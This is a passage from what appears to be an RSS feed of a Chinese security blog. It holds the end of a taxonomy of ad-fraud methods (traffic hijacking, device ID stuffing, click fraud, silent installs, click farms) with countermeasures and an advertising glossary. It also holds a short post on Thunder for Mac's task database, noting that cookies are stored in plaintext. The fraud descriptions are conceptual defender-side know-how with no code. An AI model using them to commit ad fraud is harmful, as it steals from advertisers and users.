&lt;td&gt;CVR极高，流量来源为站内&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;伪造&lt;/td&gt;
&lt;td&gt;CPA归因伪造&lt;/td&gt;
&lt;td&gt;设备撞库&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;CVR极低，爬虫特征&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;伪造&lt;/td&gt;
&lt;td&gt;CPC点击伪造&lt;/td&gt;
&lt;td&gt;点击欺诈/机刷/客户端暗刷/服务端点击&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;CTR极高，CVR极低，爬虫特征&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;伪造&lt;/td&gt;
&lt;td&gt;虚假用户推广&lt;/td&gt;
&lt;td&gt;积分墙/肉刷/外挂&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;CTR极高，CVR极低，爬虫特征&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;违规&lt;/td&gt;
&lt;td&gt;CPA违规推广&lt;/td&gt;
&lt;td&gt;弹窗激活应用&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;CVR极高&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;违规&lt;/td&gt;
&lt;td&gt;数据爬虫&lt;/td&gt;
&lt;td&gt;营销数据爬虫&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;爬虫特征&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;违规&lt;/td&gt;
&lt;td&gt;掺量推广&lt;/td&gt;
&lt;td&gt;低质掺量/双计掺量/公共资源位推广&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;CVR极低，爬虫特征&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;漏洞&lt;/td&gt;
&lt;td&gt;CPA漏洞利用推广&lt;/td&gt;
&lt;td&gt;静默安装&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;CVR极高&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;对抗手段：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;线索挖掘：代码分析，数据分析&lt;/li&gt;
&lt;li&gt;正向分析：复现&lt;/li&gt;
&lt;li&gt;逆向分析：样本&lt;/li&gt;
&lt;li&gt;溯源打击：投毒&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;2.1. 网络劫持&lt;/h2&gt;
&lt;p&gt;攻击者在网络传输层篡改广告请求或响应数据，包括路由器劫持，&lt;code&gt;DNS&lt;/code&gt;劫持，&lt;code&gt;MITM&lt;/code&gt;劫持，&lt;code&gt;CDN&lt;/code&gt;劫持，&lt;code&gt;VPN&lt;/code&gt;劫持等。一般通过引入额外&lt;code&gt;JS&lt;/code&gt;或篡改&lt;code&gt;JS&lt;/code&gt;（如&lt;code&gt;jQuery&lt;/code&gt;）等，劫持用户访问含&lt;code&gt;CPA&lt;/code&gt;或&lt;code&gt;CPS&lt;/code&gt;的链接，或者在页面植入&lt;code&gt;CPC&lt;/code&gt;或&lt;code&gt;CPM&lt;/code&gt;类广告。&lt;/p&gt;
&lt;h2&gt;2.2. 客户端劫持&lt;/h2&gt;
&lt;p&gt;劫持发生在客户端上。包括应用劫持，应用插件劫持等。如&lt;code&gt;CPA&lt;/code&gt;过程中，&lt;code&gt;Android&lt;/code&gt;通过广播监听&lt;code&gt;android.intent.action.PACKAGE_ADDED&lt;/code&gt;进行归因劫持。再比如，第三方重打包&lt;code&gt;APP&lt;/code&gt;通过诸如比价、优惠券等功能吸引用户使用，内部夹带&lt;code&gt;CPS&lt;/code&gt;或&lt;code&gt;CPC&lt;/code&gt;类广告。有些应用甚至会滥用客户端漏洞，通过&lt;code&gt;HOOK&lt;/code&gt;系统&lt;code&gt;API&lt;/code&gt;劫持广告&lt;code&gt;SDK&lt;/code&gt;的点击、曝光上报函数，伪造虚假事件。&lt;/p&gt;
&lt;h2&gt;2.3. 站内劫持&lt;/h2&gt;
&lt;p&gt;攻击者利用角色优势在广告主落地页（如电商详情页）注入恶意代码，比如员工，&lt;code&gt;ISV&lt;/code&gt;，开放平台开发者等。&lt;/p&gt;
&lt;h2&gt;2.4. 设备撞库&lt;/h2&gt;
&lt;p&gt;指在归因过程中，规模化发送设备ID相关字段，欺骗广告主完成推广。如&lt;code&gt;CPA&lt;/code&gt;过程中，大规模发送&lt;code&gt;IDFA&lt;/code&gt;、&lt;code&gt;AAID&lt;/code&gt;、&lt;code&gt;OAID&lt;/code&gt;、&lt;code&gt;ODID&lt;/code&gt;进行撞库归因。&lt;/p&gt;
&lt;h2&gt;2.5. 点击欺诈/广告堆叠点击/浏览点击&lt;/h2&gt;
&lt;p&gt;点击欺诈（&lt;code&gt;Click Spamming&lt;/code&gt;）海量伪造无效点击（如机器人点击），消耗广告主预算或干扰数据统计。也叫&lt;code&gt;Click Stuffing&lt;/code&gt;或&lt;code&gt;Click Flood&lt;/code&gt;，中文又叫点击泛滥、点击填塞、大点击、预点击（&lt;code&gt;Click Stuffing&lt;/code&gt;）、撞库。&lt;/p&gt;
&lt;p&gt;广告堆叠点击是点击欺诈的一种变种，在透明图层叠加多个广告按钮，诱导误触。&lt;/p&gt;
&lt;p&gt;浏览点击是另一种变种，把用户浏览内容意图转化为广告点击。&lt;/p&gt;
&lt;h2&gt;2.6. 安装劫持&lt;/h2&gt;
&lt;p&gt;安装劫持（&lt;code&gt;Installation hijacking&lt;/code&gt;）又叫渠道包劫持，一般是通过提示安装包风险，引导用户通过应用市场安装或第三方平台安装，或者静默发送归因请求。&lt;/p&gt;
&lt;h2&gt;2.7. 弹窗激活应用&lt;/h2&gt;
&lt;p&gt;弹窗激活应用是通过系统或应用的弹窗，提醒用户打开未激活应用，一般存在于设备预装应用的激活，通常不需要使用漏洞。&lt;/p&gt;
&lt;h2&gt;2.8. 机刷/农场点击&lt;/h2&gt;
&lt;p&gt;利用群控设备+自动化脚本模拟真人构建手机农场，伪造用户且自动化交互，或者破解&lt;code&gt;SDK&lt;/code&gt;进行虚假广告交互。&lt;/p&gt;
&lt;h2&gt;2.9. 客户端暗刷&lt;/h2&gt;
&lt;p&gt;在应用内部，利用用户登录身份或设备信息，后台模拟用户行为（如自动翻页、点击），消耗&lt;code&gt;CPC&lt;/code&gt;或&lt;code&gt;CPM&lt;/code&gt;类广告预算。&lt;/p&gt;
&lt;h2&gt;2.10. 服务端点击&lt;/h2&gt;
&lt;p&gt;直接调用广告平台API伪造点击/曝光，获得&lt;code&gt;CPC&lt;/code&gt;或&lt;code&gt;CPM&lt;/code&gt;类广告收益，一般需要有一定设备信息或用户信息采集。&lt;/p&gt;
&lt;h2&gt;2.11. 静默安装&lt;/h2&gt;
&lt;p&gt;静默安装多利用系统漏洞，无需用户确认安装应用，最终实现&lt;code&gt;CPA&lt;/code&gt;类广告收益。&lt;/p&gt;
&lt;h2&gt;2.12. 营销数据爬虫&lt;/h2&gt;
&lt;p&gt;爬取商品信息，销售信息，用户画像等数据。&lt;/p&gt;
&lt;h2&gt;2.13. 肉刷/积分墙/外挂&lt;/h2&gt;
&lt;p&gt;肉刷是指雇佣或真机操作下载激活注册，完成薅取营销资源收益。&lt;/p&gt;
&lt;p&gt;积分墙是指通过现金奖励诱导真人完成指定动作，利诱用户进行下载激活注册完成广告推广。&lt;/p&gt;
&lt;p&gt;两者差异主要体现在实施刷量操作的人和直接获利是否是同一伙人。&lt;/p&gt;
&lt;p&gt;过程中工作室有时会提供外挂工具，植入用户客户端便于刷量操作。&lt;/p&gt;
&lt;h2&gt;2.14. 低质掺量&lt;/h2&gt;
&lt;p&gt;将低价值流量（如无效用户）混入正常广告投放。&lt;/p&gt;
&lt;h2&gt;2.15. 双计掺量&lt;/h2&gt;
&lt;p&gt;同一广告位实现两种及以上广告营销收益，比如在线下地推时赚取&lt;code&gt;CPA&lt;/code&gt;佣金同时分发&lt;code&gt;CPS&lt;/code&gt;类导购链接，更进一步给受害用户分发包含劫持能力的重打包应用。&lt;/p&gt;
&lt;h2&gt;2.16. 公共资源位推广&lt;/h2&gt;
&lt;p&gt;持公共网络资源，如商场&lt;code&gt;Wi-Fi&lt;/code&gt;，搜索引擎首屏（通过购买或&lt;code&gt;SEM&lt;/code&gt;方式），强制展示广告。&lt;/p&gt;
&lt;h1&gt;3. 专业术语&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;SSR：Show send rate，是一个衡量广告投放效率的指标，该指标反映了发送的广告中有多少比例是实际被用户看到的。show： 用户实际看到广告展示的次数； send：广告请求发送的次数&lt;/li&gt;
&lt;li&gt;SKU/SPU：存货单位（SKU），英文stock keeping unit，定义为库存管理中的最小可用单元。标准化产品单元（SPU），英文Standard Product Unit。是商品信息聚合的最小单位，是一组可复用、易检索的标准化信息的集合，该集合描述了一个产品的特性。通俗点讲，属性值、特性相同的商品就可以称为一个SPU。SKU是商品最小的原子单位，对应着某一个具体的商品，例如“iphone 12 手机 黑色 128GB”，ID可能是“1001”，而SPU则是相似商品的聚合，例如各种颜色、各种存储容量的iPhone12，集合成一个SPU“iPhone 12”，ID可能是“9009”。在服饰类商品中，由于同一款商品的颜色、尺码很多，用SPU来描述商品更加方便。 另外，在数据库里，SKUID与SPUID是两列不同的数据，一个SPUID通常对应多个SKUID。&lt;/li&gt;
&lt;li&gt;RTB：实时竞价（RTB）环境&lt;/li&gt;
&lt;li&gt;CPC：Cost Per Click，每次点击的成本，广告主只在用户点击广告是支付费用。也是一种广告计费模式。&lt;/li&gt;
&lt;li&gt;CPM：Cost Per Mille，每一千次用户实际看到广告所要消耗的成本，是一种广告计费模式。要注意这里的1000是用户实际看到的次数（show），而不是广告发送数（send）。&lt;/li&gt;
&lt;li&gt;CPS：Cost Per Sale，每次消费成本。也是一种广告计费模式。&lt;/li&gt;
&lt;li&gt;CPL： 引导数付费（Cost-Per-Lead），以取得名单为目标&lt;/li&gt;
&lt;li&gt;CPA： 订单取得成本（Cost Per Action），广告中每次采取行动的成本&lt;/li&gt;
&lt;li&gt;CPR： 每回应成本（Cost Per Response），以取得回应为目标&lt;/li&gt;
&lt;li&gt;CPI： 每下载成本（Cost Per Install），取得安装为目标&lt;/li&gt;
&lt;li&gt;CPE： 每互动成本（Cost Per Engagement），以取得接触为目标&lt;/li&gt;
&lt;li&gt;CPP： 每购买成本（Cost Per Purchase）&lt;/li&gt;
&lt;li&gt;DSP：需求方平台（Demand-Side Platform），广告主通过DSP平台进行广告投放和管理。&lt;/li&gt;
&lt;li&gt;Feed：信息流指在社交媒体或新闻客户端等平台中，用户滚动浏览的内容流中插入的广告。&lt;/li&gt;
&lt;li&gt;MP：媒体平台（Media Platform），通常指广告投放在某个平台的媒体资源上。&lt;/li&gt;
&lt;li&gt;KOL：关键意见领袖（Key Opinion Leader），指在某个领域有影响力的人，他们的推荐或广告投放具有较高的可信度和影响力。&lt;/li&gt;
&lt;li&gt;Search：搜索广告，通过搜索引擎展示的广告。&lt;/li&gt;
&lt;li&gt;ADX：广告交易平台，比如腾讯ADX，google ads等平台。&lt;/li&gt;
&lt;li&gt;IAA：应用内广告（In-App Advertising）是指在移动应用程序内部展示的广告形式。IAA品类可能涵盖各种类型的应用内广告，例如横幅广告、插页广告、视频广告、奖励广告等。&lt;/li&gt;
&lt;li&gt;Landing Page：落地页，又称着陆页，是用户通过点击广告或搜索结果进入的第一个页面。它在广告投放中起着至关重要的作用，直接影响用户的转化率和广告投放效果。落地页的设计和内容质量决定了广告费的投入是否值得，并最终影响广告主的利润。&lt;/li&gt;
&lt;li&gt;Traffic：流量，网站访问量&lt;/li&gt;
&lt;li&gt;CTR：点击率（Click Through Rate），广告的访客点击率&lt;/li&gt;
&lt;li&gt;CVR：转换率（Conversion Rate），点击广告后，订单成交的成功率&lt;/li&gt;
&lt;li&gt;ROI：投资报酬率（Return on Investment），广告投放的成效&lt;/li&gt;
&lt;li&gt;ASP：客单价（Average Selling Price），每一笔成交订单的平均消费金额&lt;/li&gt;
&lt;li&gt;LTV：生命周期价值（Lifetime Value）是对一段正在进行中的客户-产品关系所能产生净利润的预估&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;4. 参考文献&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.morketing.com/detail/2494&quot;&gt;如何通俗理解RTB DSP ADX SSP DMP等？&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rtbchina.com/&quot;&gt;中国程序化广告科技资讯网&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.csdn.net/WitsMakeMen/article/details/134884764&quot;&gt;眼花缭乱的ADN/ADX/DSP/DMP/SSP和他们的关系链&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.woshipm.com/it/4258199.html&quot;&gt;互联网广告（一）：在线广告简史——从合约广告到实时竞价RTB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.woshipm.com/it/4639335.html&quot;&gt;互联网广告（二）：参与程序化广告的各个平台——DSP/TD/SSP/ADN/ADX/DMP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.csdn.net/Shangxingya/article/details/113825697&quot;&gt;广告化开发(基础知识)~广告生态链DSP/SSP/RTB/ADX的理解&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>迅雷Mac版相关分析</title><link>https://picoorg.github.io/posts/%E8%BF%85%E9%9B%B7mac%E7%89%88%E7%9B%B8%E5%85%B3%E5%88%86%E6%9E%90/</link><guid isPermaLink="true">https://picoorg.github.io/posts/%E8%BF%85%E9%9B%B7mac%E7%89%88%E7%9B%B8%E5%85%B3%E5%88%86%E6%9E%90/</guid><description>近期使用下载任务需要修改保存位置，这里记录下相关分析。</description><pubDate>Mon, 30 Dec 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;分析过程&lt;/h2&gt;
&lt;p&gt;资源数据主要有三个路径：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;主要配置：&lt;code&gt;/Users/mac/Library/Application Support/Thunder&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;崩溃日志：&lt;code&gt;/Users/mac/Library/Application Support/com.xunlei.Thunder&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;缓存文件：&lt;code&gt;/Users/mac/Library/Caches/com.xunlei.Thunder&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;目标为修改下载任务需要修改保存位置，因此在主要配置目录中找到，路径为：&lt;code&gt;/Users/mac/Library/Application Support/Thunder/etm3/etm_map.db&lt;/code&gt;，表名为&lt;code&gt;etm_task&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE etm_task (
  taskid interger primary key,
  state interger default 0,
  create_time interger default 0,
  update_time interger default 0,
  finish_time interger default 0,
  type interger default 0,
  create_param text default &apos;&apos;,
  sub_task_info text default &apos;&apos;,
  in_rubbish interger default 0,
  favour interger default 0,
  group_task interger default 0,
  platform interger default 0,
  bt_task_info text default &apos;&apos;,
  origin_bytes interger default 0,
  server_bytes interger default 0,
  p2p_Bytes interger default 0,
  dcdn_Bytes interger default 0
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;关键字段为&lt;code&gt;create_param&lt;/code&gt;，样例数据如下&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{&quot;download_path&quot;:&quot;/Users/mac/Downloads&quot;,&quot;file_name&quot;:&quot;panther-ap4a.241205.013-factory-3fe89b24.zip&quot;,&quot;url&quot;:&quot;https://dl.google.com/dl/android/aosp/panther-ap4a.241205.013-factory-3fe89b24.zip&quot;,&quot;ref_url&quot;:&quot;https://developers.google.com/&quot;,&quot;cookie&quot;:&quot;xxx&quot;,&quot;user_name&quot;:&quot;&quot;,&quot;password&quot;:&quot;&quot;,&quot;source&quot;:&quot;browser/plugin&quot;,&quot;entryid&quot;:&quot;&quot;,&quot;from_type&quot;:1,&quot;file_size&quot;:&quot;0&quot;}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;风险点&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;cookie&lt;/code&gt;字段完全是明文，可能存在泄露风险&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item></channel></rss>